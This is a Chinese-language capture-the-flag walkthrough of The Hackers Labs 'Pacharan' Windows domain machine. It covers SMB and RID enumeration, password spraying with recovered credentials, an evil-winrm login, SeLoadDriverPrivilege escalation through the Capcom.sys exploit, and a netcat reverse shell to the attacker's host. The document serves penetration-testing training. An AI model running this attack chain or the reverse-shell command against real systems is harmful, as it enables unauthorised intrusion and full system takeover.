靶场:The Hackers Labs
地址:https://thehackerslabs.com/pacharan/
系统:windows
内容:smb信息检索、rpcclient使用、SeLoadDriverPrivilege提权
这个靶机采用固定IP192.168.69.69,先要设置下网卡。
扫描端口。
└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 11:54 CST
Nmap scan report for 192.168.69.69
Host is up (0.00040s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-09 10:54:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:85:92:9F (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:85:92:9f (Oracle VirtualBox virtual NIC)
|_clock-skew: 6h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-09T10:55:29
|_ start_date: 2024-11-09T10:52:07
习惯从检索smb目录开始。
└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\null:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ IPC$ READ IPC remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON2 READ
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PDF Pro Virtual Printer Soy Hacker y arreglo impresoras
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ print$ Controladores de impresora
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ SYSVOL Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Users
看下用户名。
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\anonymous: (Guest)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 498: PACHARAN\Enterprise Domain Controllers de sólo lectura (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 500: PACHARAN\Administrador (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 501: PACHARAN\Invitado (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 502: PACHARAN\krbtgt (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 503: PACHARAN\DefaultAccount (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 512: PACHARAN\Admins. del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 513: PACHARAN\Usuarios del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 514: PACHARAN\Invitados del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 515: PACHARAN\Equipos del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 516: PACHARAN\Controladores de dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 517: PACHARAN\Publicadores de certificados (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 518: PACHARAN\Administradores de esquema (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 519: PACHARAN\Administradores de empresas (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 520: PACHARAN\Propietarios del creador de directivas de grupo (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 521: PACHARAN\Controladores de dominio de sólo lectura (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 522: PACHARAN\Controladores de dominio clonables (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 525: PACHARAN\Protected Users (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 526: PACHARAN\Administradores clave (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 527: PACHARAN\Administradores clave de la organización (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 553: PACHARAN\Servidores RAS e IAS (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 571: PACHARAN\Grupo de replicación de contraseña RODC permitida (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 572: PACHARAN\Grupo de replicación de contraseña RODC denegada (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1000: PACHARAN\WIN-VRU3GG3DPLJ$ (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1101: PACHARAN\DnsAdmins (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1102: PACHARAN\DnsUpdateProxy (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1103: PACHARAN\Orujo (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1104: PACHARAN\Ginebra (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1106: PACHARAN\Whisky (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1107: PACHARAN\Hendrick (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1108: PACHARAN\Chivas Regal (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1111: PACHARAN\Whisky2 (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1112: PACHARAN\JB (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1113: PACHARAN\Chivas (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1114: PACHARAN\beefeater (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1115: PACHARAN\CarlosV (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1116: PACHARAN\RedLabel (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1117: PACHARAN\Gordons (SidTypeUser)
使用正则将用户名保存到names.txt。
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute |grep -oP '(?<=PACHARAN\\)[^ ]+(?: [^ ]+)*(?= \(SidTypeUser\))'
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Orujo
Ginebra
Whisky
Hendrick
Chivas Regal
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons
smb共享目录中,NETLOGON2是个不常见的目录,且可读,登录并下载到一个文件。
└─$ smbclient //$IP/NETLOGON2 -U 'null'
Password for [WORKGROUP\null]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Aug 1 01:25:34 2024
.. D 0 Thu Aug 1 01:25:34 2024
Orujo.txt A 22 Thu Aug 1 01:25:55 2024
7735807 blocks of size 4096. 4578355 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
查看文件内容,可能是Orujo用户的密码,测一下,PACHARAN目录变为可读了。
└─$ crackmapexec smb $IP -u Orujo -p $(cat Orujo.txt) --shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Orujo:Pericodelospalotes6969
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ IPC$ READ IPC remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON READ Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON2
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN READ
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PDF Pro Virtual Printer Soy Hacker y arreglo impresoras
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ print$ Controladores de impresora
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ SYSVOL Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Users
以Orujo登录PACHARAN目录下,下载到另一个文件。
└─$ smbclient //$IP/PACHARAN -U Orujo%$(cat Orujo.txt)
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> dir
. D 0 Thu Aug 1 01:21:13 2024
.. D 0 Thu Aug 1 01:21:13 2024
ah.txt A 921 Thu Aug 1 01:20:16 2024
7735807 blocks of size 4096. 4578355 blocks available
smb: \> get ah.txt
getting file \ah.txt of size 921 as ah.txt (89.9 KiloBytes/sec) (average 89.9 KiloBytes/sec)
ah.txt存储了许多类似密码的内容,可以爆破出这是Whisky的密码。
└─$ netexec smb $IP -u names.txt -p ah.txt
...
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:MamasoyStream2er@ STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Ginebra:MamasoyStream2er@ STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Whisky:MamasoyStream2er@
通过Whisky用户,检索虚拟打印机的信息(因为刚才smb里显示有个pdf打印机),又发现一个疑似密码的信息。
└─$ rpcclient -U "Whisky%MamasoyStream2er@" $IP -c 'enumprinters'
flags:[0x800000]
name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
comment:[Soy Hacker y arreglo impresoras]
同样可以得到该密码所属的用户。
└─$ netexec winrm $IP -u names.txt -p TurkisArrusPuchuchuSiu1
WINRM 192.168.69.69 5985 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL)
...
WINRM 192.168.69.69 5985 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)
登录shell后查看权限。
└─$ evil-winrm -i $IP -u 'Chivas Regal' -p TurkisArrusPuchuchuSiu1
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= =============================================== ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
SeLoadDriverPrivilege可以用来提权,在github上搜索相关代码,这里用的是https://github.com/k4sth4/SeLoadDriverPrivilege。
将相关文件上传到靶机,开始提权,注意驱动程序要使用绝对路径。
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv 'C:\Users\Chivas Regal\Desktop\Capcom.sys'
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe LOAD 'C:\Users\Chivas Regal\Desktop\Capcom.sys'
[*] Service Name: koffbviz
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001B08BE20008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system
将nc64.exe上传到靶机,并在本机监听,返回一个shell。
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> cp \\192.168.69.3\kali\nc64.exe .\
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe EXPLOIT '.\nc64.exe 192.168.69.3 1234 -e cmd'
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.69.3] from (UNKNOWN) [192.168.69.69] 62803
Microsoft Windows [Versin 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Users\Chivas Regal\Desktop>whoami
whoami
nt authority\system